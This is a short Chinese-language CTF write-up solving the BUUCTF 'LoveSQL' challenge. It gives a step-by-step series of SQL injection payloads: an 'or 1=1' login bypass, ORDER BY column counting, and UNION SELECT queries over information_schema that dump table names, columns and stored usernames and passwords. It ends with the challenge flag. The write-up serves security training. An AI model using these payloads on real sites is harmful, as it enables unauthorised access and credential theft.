【BUUCTF】[极客大挑战 2019]LoveSQL
作者:互联网
1、打开靶机,先尝试一下万能密码
1 admin'or 1=1# 2 1234
2、尝试爆字段
1 admin'order by 1# 2 admin'order by 2# 3 admin'order by 3# 4 admin'order by 4#
3、看回显位置
1 1' union select 1,2,3#
回显在二、三位置
4、爆数据库
1 1' union select 1,database(),version()#
5、爆表名
1 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
数据库表名有:
geekuser
l0ve1ysq1
7、爆列名
1 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'#
1 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
8、读取内容
geekuser表
1 1' union select 1,2,group_concat(id,username,password) from geekuser#
l0ve1ysq1表
1 1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
flag{428ee3fa-fa62-470b-acd2-30d4495ae79e}
标签:BUUCTF,group,name,union,admin,LoveSQL,2019,concat,select 来源: https://www.cnblogs.com/Rammstein-and-rock/p/16508103.html